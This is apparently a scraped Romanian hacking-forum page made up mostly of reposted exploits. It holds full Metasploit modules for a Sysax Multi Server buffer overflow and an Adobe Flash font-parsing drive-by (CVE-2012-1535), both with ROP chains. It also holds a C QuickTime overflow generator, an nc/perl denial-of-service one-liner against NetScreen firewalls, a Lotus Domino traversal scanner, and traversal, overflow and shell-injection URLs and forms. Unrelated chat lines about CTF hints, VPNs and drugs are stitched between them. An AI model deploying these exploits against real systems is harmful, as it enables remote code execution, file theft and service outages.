DarkLegion

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # Penetration Testing Software | Metasploit ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Sysax Multi Server 5.64 Create Folder Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the create folder function in Sysax Multi Server 5.64. This issue was fixed in 5.66. In order to trigger the vulnerability valid credentials with the create folder permission must be provided. The HTTP option must be enabled on Sysax too. This module will log into the server, get a SID token, find the root folder, and then proceed to exploit the server. Successful exploits result in SYSTEM access. This exploit works on XP SP3, and Server 2003 SP1-SP2. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt "hostess" Andreko', ], 'References' => [ [ 'EDB', '20676' ], [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00\x2F\x0d\x0a", # 0d and 0a are only bad, due to the Rex::MIME replacing 0d with 0d0a in the message#to_s 'Space' => '1299', 'DisableNops' => true, }, 'Targets' => [ [ 'Windows XP SP3 / Sysax Multi Server 5.64', { 'Rop' => false, 'Ret' => 0x77c35459, # push esp # ret [msvcrt.dll] 'Offset' => 711, } ], [ 'Windows 2003 SP1-SP2 / Sysax Multi Server 5.64', { 'Rop' => true, 'Ret' => 0x77baf605, # pop esi; pop ebp; retn 0c; [msvcrt.dll] (pivot) 'Offset' => 711, 'Nop' => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] } ], ], 'Privileged' => true, 'DisclosureDate'=> 'Jul 29 2012', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The URI path to the Sysax web application', '/']), Opt::RPORT(80), OptString.new('SysaxUSER', [ true, "Username" ]), OptString.new('SysaxPASS', [ true, "Password" ]) ], self.class) end def create_rop_chain() rop_gadgets = [] # ROP chains provided by Corelan.be # https://www.corelan.be/index.php/security/corelan-ropdb/#msvcrtdll_8211_v7037903959_Windows_2003_SP1_SP2 if (target == targets[1]) # Windows 2003 rop_gadgets = [ 0x77be3adb, # POP EAX # RETN [msvcrt.dll] 0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll] 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll] 0x41414141, # Filler (compensate) 0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll] 0x77bdb896, # POP EBP # RETN [msvcrt.dll] 0x77be2265, # & push esp # ret [msvcrt.dll] 0x77bdeebf, # POP EAX # RETN [msvcrt.dll] 0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx) 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll] 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx) 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] 0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll] 0x77bcc2ee, # POP ECX # RETN [msvcrt.dll] 0x77befbb4, # &Writable location [msvcrt.dll] 0x77bbf75e, # POP EDI # RETN [msvcrt.dll] 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] 0x90909090, # nop 0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll] ].flatten.pack("V*") end return rop_gadgets end def get_sid user = datastore['SysaxUSER'] pass = datastore['SysaxPASS'] creds = "fd=#{Rex::Text.encode_base64(user+"\x0a"+pass)}" # Login to get SID value r = send_request_cgi({ 'method' => "POST", 'uri' => "#{target_uri.to_s}scgi?sid=0&pid=dologin", 'data' => creds }) # Parse response for SID token sid = r.body.match(/sid=([A-Z0-9a-z]{40})/)[1] print_status "SID: #{sid.to_s}" sid.to_s end def get_root_path(sid) # Find the path because it's used to help calculate the offset random_folder_name = rand_text_alpha(8) # This folder should not exist in the root dir r = send_request_cgi({ 'uri' => "#{target_uri.to_s}scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm", 'method' => 'POST', }) # Example message: invalid path: C:\Documents and Settings\Administrator\Desktop\9dk2hdh2. # Root Path should be C:\Documents and Settings\Administrator\Desktop (no trailing slash) root_path = r.body.match(/^invalid path: (.*)\\#{random_folder_name}\.$/)[1] print_status "Root Dir: #{root_path}" root_path end def exploit connect sid = get_sid root_path = get_root_path(sid) buffer = rand_text(target['Offset']-root_path.length) buffer << [target.ret].pack('V') if (target['Rop']) buffer << [target['Nop']].pack('V')*16 buffer << create_rop_chain() end buffer << make_nops(15) buffer << payload.encoded post_data = Rex::MIME::Message.new post_data.add_part(buffer, nil, nil, "form-data; name=\"e2\"") post_data.bound = rand_text_numeric(57) # example; "---------------------------12816808881949705206242427669" r = send_request_cgi({ 'uri' => "#{target_uri.to_s}scgi?sid=#{sid}&pid=mk_folder2_name1.htm", 'method' => 'POST', 'data' => post_data.to_s, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", }) disconnect end end

Mda.. scuze ca am postat fara .. am uitat de el

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # Penetration Testing Software | Metasploit ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => "Adobe Flash Player 11.3 Font Parsing Code Execution", 'Description' => %q{ This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt Font file used by the SWF, it is possible to gain arbitrary remote code execution under the context of the user, as exploited in the wild. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alexander Gavrun', #Through iDefense 'sinn3r', 'juan vazquez' ], 'References' => [ [ 'CVE', '2012-1535' ], [ 'OSVDB', '84607'], [ 'BID', '55009'], [ 'URL', 'http://labs.alienvault.com/labs/index.php/2012/cve-2012-1535-adobe-flash-being-exploited-in-the-wild/' ], [ 'URL', 'http://vrt-blog.snort.org/2012/08/cve-2012-1535-flash-0-day-in-wild.html' ], [ 'URL', 'http://contagiodump.blogspot.com.es/2012/08/cve-2012-1535-samples-and-info.html' ] ], 'Payload' => { 'Space' => 1024 }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ # Tested successfully on: # Flash 11.3.300.268 # Flash 11.3.300.265 # Flash 11.3.300.257 [ 'Automatic', {} ], [ 'IE 6 on Windows XP SP3', { 'Rop' => nil } ], [ 'IE 7 on Windows XP SP3', { 'Rop' => nil } ], [ 'IE 8 on Windows XP SP3', { 'Rop' => true } ] ], 'Privileged' => false, 'DisclosureDate' => "Aug 9 2012", 'DefaultTarget' => 0)) register_options( [ OptEnum.new('ROP', [true, "The ROP chain to use", 'SWF', %w(SWF JRE)]), ], self.class) end def nop return make_nops(4).unpack("L")[0].to_i end def get_payload(t, flash_version=nil) if t['Rop'].nil? p = [ 0x0c0c0c0c, # mapped at 1e0d0000 0x0c0c0c0c, 0x0c0c0c0c, # mapped at 1e0d0008 ].pack("V*") p << payload.encoded else if datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,257/ print_status("Using Rop Chain For Flash: #{flash_version}") stack_pivot = [ 0x10004171, # POP EDI # POP ESI # RETN (1e0d0000) 0x0c0c0c0c, 0x1001d891, # xchg eax, esp # ret (1e0d0008) ].pack("V*") rop = [ 0x10241001, # POP EAX # RETN (Flash32_11_3_300_257.ocx) 0x106e3384, # <- *&VirtualProtect() 0x1029de2f, # MOV EAX,DWORD PTR DS:[EAX] # RETN (Flash32_11_3_300_257.ocx) 0x106add37, # XCHG EAX,ESI # RETN (Flash32_11_3_300_257.ocx) 0x1064e000, # POP EBP # RETN (Flash32_11_3_300_257.ocx) 0x10175c57, # ptr to 'jmp esp' (from Flash32_11_3_300_257.ocx) 0x106a4010, # POP EBX # RETN (Flash32_11_3_300_257.ocx) 0x00000201, # <- change size to mark as executable if needed (-> ebx) 0x104de800, # POP ECX # RETN (Flash32_11_3_300_257.ocx) 0x10955000, # W pointer (lpOldProtect) (-> ecx) 0x10649003, # POP EDI # RETN (Flash32_11_3_300_257.ocx) 0x10649004, # ROP NOP (-> edi) 0x10649987, # POP EDX # RETN (Flash32_11_3_300_257.ocx) 0x00000040, # newProtect (0x40) (-> edx) 0x10241001, # POP EAX # RETN (Flash32_11_3_300_257.ocx) nop, # NOPS (-> eax) 0x1060e809, # PUSHAD # RETN (Flash32_11_3_300_257.ocx) ].pack("V*") elsif datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,265/ print_status("Using Rop Chain For Flash: #{flash_version}") stack_pivot = [ 0x10004171, # POP EDI # POP ESI # RETN (1e0d0000) 0x0c0c0c0c, 0x1001d6d3, # xchg eax, esp # ret (1e0d0008) ].pack("V*") rop = [ 0x10241002, # POP EAX # RETN (Flash32_11_3_300_265.ocx) 0x106e338c, # <- *&VirtualProtect() 0x1029ea04, # MOV EAX,DWORD PTR DS:[EAX] # RETN (Flash32_11_3_300_265.ocx) 0x103d60b8, # XCHG EAX,ESI # RETN (Flash32_11_3_300_265.ocx) 0x105cc000, # POP EBP # RETN (Flash32_11_3_300_265.ocx) 0x1001c5cd, # ptr to 'jmp esp' (from Flash32_11_3_300_265.ocx) 0x10398009, # POP EBX # RETN (Flash32_11_3_300_265.ocx) 0x00000201, # <- change size to mark as executable if needed (-> ebx) 0x10434188, # POP ECX # RETN (Flash32_11_3_300_265.ocx) 0x10955000, # W pointer (lpOldProtect) (-> ecx) 0x105c1811, # POP EDI # RETN (Flash32_11_3_300_265.ocx) 0x105c1812, # ROP NOP (-> edi) 0x10650602, # POP EDX # RETN (Flash32_11_3_300_265.ocx) 0x00000040, # newProtect (0x40) (-> edx) 0x10241002, # POP EAX # RETN (Flash32_11_3_300_265.ocx) nop, # NOPS (-> eax) 0x1062800f, # PUSHAD # RETN (Flash32_11_3_300_265.ocx) ].pack("V*") elsif datastore['ROP'] == 'SWF' and flash_version =~ /11,3,300,268/ print_status("Using Rop Chain For Flash: #{flash_version}") stack_pivot = [ 0x10004171, # POP EDI # POP ESI # RETN (1e0d0000) 0x0c0c0c0c, 0x1001d755, # xchg eax, esp # ret (1e0d0008) ].pack("V*") rop = [ 0x1023e9b9, # POP EAX # RETN (Flash32_11_3_300_268.ocx) 0x106e438c, # <- *&VirtualProtect() 0x10198e00, # MOV EAX,DWORD PTR DS:[EAX] # RETN (Flash32_11_3_300_268.ocx) 0x106ddf15, # XCHG EAX,ESI # RETN (Flash32_11_3_300_268.ocx) 0x1035f000, # POP EBP # RETN (Flash32_11_3_300_268.ocx) 0x10175c28, # ptr to 'jmp esp' (from Flash32_11_3_300_268.ocx) 0x105e0013, # POP EBX # RETN (Flash32_11_3_300_268.ocx) 0x00000201, # <- change size to mark as executable if needed (-> ebx) 0x10593801, # POP ECX # RETN (Flash32_11_3_300_268.ocx) 0x1083c000, # RW pointer (lpOldProtect) (-> ecx) 0x10308b0e, # POP EDI # RETN (Flash32_11_3_300_268.ocx) 0x10308b0f, # ROP NOP (-> edi) 0x10663a00, # POP EDX # RETN (Flash32_11_3_300_268.ocx) 0x00000040, # newProtect (0x40) (-> edx) 0x1023e9b9, # POP EAX # RETN (Flash32_11_3_300_268.ocx) nop, # NOPS (-> eax) 0x1069120b, # PUSHAD # RETN (Flash32_11_3_300_268.ocx) ].pack("V*") else print_status("Default back to JRE ROP") stack_pivot = [ 0x7c34a028, # POP EDI # POP ESI # RETN (1e0d0000) 0x0c0c0c0c, 0x7c348b05, # xchg eax, esp # ret (1e0d0008) ].pack("V*") rop = [ 0x7c37653d, # POP EAX # POP EDI # POP ESI # POP EBX # POP EBP # RETN 0x00001000, # (dwSize) 0x7c347f98, # RETN (ROP NOP) 0x7c3415a2, # JMP [EAX] 0xffffffff, 0x7c376402, # skip 4 bytes 0x7c345255, # INC EBX # FPATAN # RETN 0x7c352174, # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN 0x7c344f87, # POP EDX # RETN 0x00000040, # flNewProtect 0x7c34d201, # POP ECX # RETN 0x7c38b001, # &Writable location 0x7c347f97, # POP EAX # RETN 0x7c37a151, # ptr to &VirtualProtect() - 0x0EF [IAT msvcr71.dll] 0x7c378c81, # PUSHAD # ADD AL,0EF # RETN 0x7c345c30, # ptr to 'push esp # ret ' ].pack("V*") end p = stack_pivot p << rop p << payload.encoded end return p end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/ return targets[1] #IE 6 on Windows XP SP3 elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/ return targets[2] #IE 7 on Windows XP SP3 elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 8/ return targets[3] #IE 8 on Windows XP SP3 else return nil end end def on_request_uri(cli, request) agent = request.headers['User-Agent'] print_status("User-agent: #{agent}") my_target = get_target(agent) print_status("Client requesting: #{request.uri}") # Avoid the attack if the victim doesn't have the same setup we're targeting if my_target.nil? print_error("Browser not supported: #{agent}") send_not_found(cli) return end # The SWF request itself if request.uri =~ /\.swf$/ print_status("Sending SWF") send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash'}) return end # The TXT payload request if request.uri =~ /\.txt$/ flash_version = request.headers['x-flash-version'] shellcode = get_payload(my_target, flash_version).unpack('H*')[0] print_status("Sending Payload") send_response(cli, shellcode, { 'Content-Type' => 'text/plain' }) return end swf_uri = get_resource() + Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".swf" html = %Q| <html> <head> </head> <body> <object width="1" height="1" type="application/x-shockwave-flash" data="#{swf_uri}"> <param name="movie" value="#{swf_uri}"> </object> </body> </html> | html = html.gsub(/^\t\t/, '') # we need to handle direct /pay.txt requests proc = Proc.new do |cli, req| on_request_uri(cli, req) end add_resource({'Path' => "/pay.txt", 'Proc' => proc}) rescue nil print_status("Sending HTML") send_response(cli, html, {'Content-Type'=>'text/html'}) end def exploit @swf = create_swf print_status("SWF Loaded: #{@swf.length.to_s} bytes") super end def create_swf path = ::File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-1535", "trigger.swf" ) fd = ::File.open( path, "rb" ) swf = fd.read(fd.stat.size) fd.close return swf end def cleanup vprint_status("Removing txt resource") remove_resource('/pay.txt') rescue nil super end end sursa

ce pula mea e asta? nu m-am speriat deloc

Apple Quicktime plugin for Windows is vulnerable to a remote buffer overflow. A maliciously-constructed web link statement in a remote HTML document, which contains excess data argumenting an EMBED tag, could permit execution of hostile code. /*==================================================================== Apple QuickTime 4.1.2 plug-in exploit The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ==================================================================== */ #include <stdio.h> #include <stdlib.h> #include <windows.h> #define MOV_FILE "c:\\program files\\quicktime\\sample.mov" #define HEIGHT 60 #define WIDTH 60 #define TARGET "QUICKTIMEPLAYER" #define FILE_IMAGE \ "<html><embed src=\"%s\" href=\"%s\" "\ "width=%d height=%d autoplay=\"true\" "\ "target=\"%s\"><br></html>" #define BUFSIZE 730 #define RET 684 #define ESP_TGT "rpcrt4.dll" #define JMPESP_1 0xff #define JMPESP_2 0xe4 #define NOP 0x90 unsigned char exploit_code[200]={ 0x33,0xC0,0x40,0x40,0x40,0x40,0x40,0x50, 0x50,0x90,0xB8,0x2D,0x23,0xF5,0xBF,0x48, 0xFF,0xD0,0x00, }; main(int argc,char *argv[]) { FILE *fp; char buf[bUFSIZE]; unsigned int i,pretadr,p,ip,kp; MEMORY_BASIC_INFORMATION meminfo; if (argc<2){ printf("usage : %s Output_HTML-fileName [sample .mov file]\n", argv[0]); exit(1); } if ((void *)(kp=(unsigned int)LoadLibrary(ESP_TGT))==NULL){ printf("%s is not found.\n",ESP_TGT); exit(1); } VirtualQuery((void *)kp,&meminfo,sizeof(MEMORY_BASIC_INFORMATION)); pretadr=0; for (i=0;i<meminfo.RegionSize;i++){ p=kp+i; if ( ( p &0xff)==0 || ((p>>8 )&0xff)==0 || ((p>>16)&0xff)==0 || ((p>>24)&0xff)==0) continue; if ( *((unsigned char *)p)==JMPESP_1 && *(((unsigned char *)p)+1)==JMPESP_2) pretadr=p; } if ((fp=fopen(argv[1],"wb"))==NULL){ printf("File write error \"%s\"\n",argv[1]); exit(1); } memset(buf,NOP,BUFSIZE); memcpy(buf+700-12,exploit_code,strlen(exploit_code)); buf[bUFSIZE-2]=0; ip=pretadr; printf("EIP=%x\n",ip); buf[RET ]=ip&0xff; buf[RET+1]=(ip>>8)&0xff; buf[RET+2]=(ip>>16)&0xff; buf[RET+3]=(ip>>24)&0xff; if (argc==2) fprintf(fp,FILE_IMAGE,MOV_FILE,buf,WIDTH,HEIGHT,TARGET); else fprintf(fp,FILE_IMAGE,argv[2],buf,WIDTH,HEIGHT,TARGET); fclose(fp); printf("Done.\n"); } ----- UNYUN % The Shadow Penguin Security [ http://shadowpenguin.backsection.net ] shadowpenguin@backsection.net (SPS-Official) unyun@shadowpenguin.org (Personal) % eEye Digital Security Team [ Vulnerability Management - Assessment - Endpoint Protection - IT Security Software | eEye Digital Security ] unyun@eEye.com sursa

Deci imi zice unu pass la warmup5?

Frumos, bravo

bbs_forum.cgi is a popular Perl cgi script from eXtropia.com. It supports the creation and maintenance of web-based threaded discussion forums. Version 1.0 of bbs_forum.cgi fails to properly validate user-supplied, URL-encoded input to the read environment variable. Maliciously-formed URLs submitted to the script may contain references to files on the host's filesystem, as well as shell commands which will be run with the privilege level of the webserver (ie, user 'nobody'). As a result, unpatched affected versions of the script permit an attacker to execute arbitrary code and to read arbitrary files on the vulnerable system. www.web*site.com/cgi-bin/bbs_forum.cgi?forum=<forum_name>&read=../../../../../../etc/hosts.allow note: The section: <forum_name> must be a valid forum on the webserver. sursa

NetScreen Firewall is a network appliance used to secure against intruders and various types of attacks to a network. NetScreen has a Web administrative Interface (WebUI) used to configure and set the firewall settings. It is possible to cause a denial of service in NetScreen Firewall. Requesting an unusually long URL to WebUI listening on default port 80, will cause the firewall to crash. A restart of the service is required in order to gain normal functionality. Once the input URL is longer than 1220 bytes=A3=ACNetScreen firewall= will crash: $echo -e "GET /`perl -e 'print "A"x1220'` HTTP/1.0\n\n"|nc= netscreen_firewall 80 SURSA

IBM HTTP Server contains AfpaCache directive which turns the Fast Response Cache Accelerator function on or off. WebSphere is a series of applications which are built upon IBM HTTP Server. Both IBM HTTP Server and Websphere are subject to a denial of service. This is caused by exhausting computer resources with malformed HTTP GET requests. A restart of the service is required inorder to gain normal functionality. GET / HTTP/1.0\r\nuser-agent: 20000xnull\r\n\r\n This request must be made multiple times before the system will freeze. SURSA

It is possible for a remote user to gain access to any known file residing on the Lotus Domino Server 5.0.6 and previous. A specially crafted HTTP request comprised of '.nsf' and '../' along with the known filename, will display the contents of the particular file with read permissions. Successful exploitation of this vulnerability could enable a remote user to gain access to systems files, password files, etc. This could lead to a complete compromise of the host. #!/usr/bin/perl # PERL script to test a Domino server for directory # traversal vulnerability. (BugTraq ID 2173, # Lotus Domino Server Directory Traversal Vulnerability) # # Michael Smith, www.netlocksmith.com # 01/15/2001 # # Credit & thanks to all of these folks: # # - To Georgi Guninski, georgi, # who discovered the original vulnerability, # and Ralph Moonen of KPMG, who found additional # URL variations # # - Roelof Temmingh, SensePost - SensePost Information Security, # author of unicodecheck.pl, on which this # script is based # # - Rain Forest Puppy, www.wiretrip.com, # author of Sendraw routine # use Socket; # --------------init if ($#ARGV<0) {die "Usage: nsfcheck targetIP[:port]";} ($host,$port)=split(/:/,@ARGV[0]); if ($port=="") {$port=80;} print "Testing $host:$port\n"; $target = inet_aton($host); @notesvuln=( "/%00%00.nsf/../lotus/domino/notes.ini", "/%00%20.nsf/../lotus/domino/notes.ini", "/%00%c0%af.nsf/../lotus/domino/notes.ini", "/%00...nsf/../lotus/domino/notes.ini", "/%00.nsf//../lotus/domino/notes.ini", "/%00.nsf/../lotus/domino/notes.ini", "/%00.nsf/..//lotus/domino/notes.ini", "/%00.nsf/../../lotus/domino/notes.ini", "/%00.nsf.nsf/../lotus/domino/notes.ini", "/%20%00.nsf/../lotus/domino/notes.ini", "/%20.nsf//../lotus/domino/notes.ini", "/%20.nsf/..//lotus/domino/notes.ini", "/%c0%af%00.nsf/../lotus/domino/notes.ini", "/%c0%af.nsf//../lotus/domino/notes.ini", "/%c0%af.nsf/..//lotus/domino/notes.ini", "/...nsf//../lotus/domino/notes.ini", "/...nsf/..//lotus/domino/notes.ini", "/.nsf///../lotus/domino/notes.ini", "/.nsf//../lotus/domino/notes.ini", "/.nsf//..//lotus/domino/notes.ini", "/.nsf/../lotus/domino/notes.ini", "/.nsf/../lotus/domino/notes.ini", "/.nsf/..///lotus/domino/notes.ini", "/.nsf%00.nsf/../lotus/domino/notes.ini", "/.nsf.nsf//../lotus/domino/notes.ini", "/.nsf.nsf/..//lotus/domino/notes.ini"); # ----- Test each possible version of vulnerability ----- foreach $notespath (@notesvuln) { my @results=sendraw("GET ".$notespath." HTTP\/1.0\r\n\r\n"); foreach $line (@results){ if ($line =~ /\[Notes\]/) {$flag=1;} } } if ($flag==0) {die("No vulnerability found at this address.\n");} else {die("This site is vulnerable.\n");} # ------------- Sendraw sub sendraw { my ($pstr)=@_; socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n"); if(connect(S,pack "SnA4x8",2,$port,$target)){ my @in; select(S); $|=1; print $pstr; while(<S>){ push @in, $_;} select(STDOUT); close(S); return @in; } else { die("Can't connect...\n"); } } # ---------------------- SURSA

vreun hint la warmup5?

AOL Instant Messenger (AIM) is a real time messaging service for users that are on line. When AOL Instant Messenger is installed, by default it configures the system so that the aim: URL protocol connects aim:// urls to the AIM client. There exists a buffer overflow in parsing aim:// URL parameters. This vulnerability exists in versions of AOL Instant previous to Messenger 4.3.2229. By sending a specially crafted URL ,using the 'aim:' protocol, comprised of 'goim' and 'screenname' parameters, it is possible for a remote user to overflow the buffer during a memory copy operation and execute arbitarary code. It should be noted that the victim need only have AIM installed on their machine to be vulnerable. Even if AIM is not running, if a user clicks or otherwise activates a malicious aim:// url, the overflow will occur. Additionally it should be noted that AIM is often included/bundled with Netscape Communicator and possibly other popular software programs. Successful exploitation of this vulnerability will lead to complete comprimise of the target host. href="aim:goim? screenname=AAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAA&message=EIP,+the+other+white+meat" >here</a><br> SURSA

source: Leif M. Wright simplestmail.cgi Remote Command Execution Vulnerability A vulnerabiliy exists in Leif M. Wright's simplestmail.cgi, a script designed to coordinate email responses from web forms. An insecurely-structured call to the open() function leads to a failure to properly filter shell metacharacters from user supplied input. As a result, it is possible for an attacker to cause this script to execute arbitrary shell commands with the privilege of the webserver. <html> <form action="http://someplace/cgi-bin/simplestmail.cgi" method=POST> Command: <input type=text name=MyEmail value=";"> <input type=hidden name=redirect value="http://goatse.cx"> <input type=submit name=submit value="run"> </form> </html> SURSA

EPIC FAIL! nu ai cum sa faci asa ceva

https://rstcenter.com/forum/56493-best-free-vpn.rst era greu sa te uiti aici

l-am incercat si eu si sunt multumit de el.. dar are unele defecte.. off: Pentru cei care vreti sa il testati si nu puteti pe PC-ul vostru intrati AICI!! cu un proxy/nologin de america/britania si faceti-va cont, alegeti windows 8, apoi conectati-va cu datele care care sunt in "view environement" in remote desktop (start->programs etc..)

Numele e cel de pe spate, dar are carcasa de E71.. o copie foarte proasta

Vrei sa faci "boom"? nu lua prafuri d-astea ca o sa arati ca dracu'

Puteai sa pui macar sursa-n plm

Am pus si eu cateva nologine si un tutorial.. acelea care au @DarkLegion la sfarsit. VIP ceva? am numele DarkLegion

E clar.. omule nu e posibil asa ceva, tot ce faci cu cheat engine e doar de frumusete, nu e real

Da tata te mai invat eu ceva? Du-te si injura de toti mortii la politie si primesti premiul nobel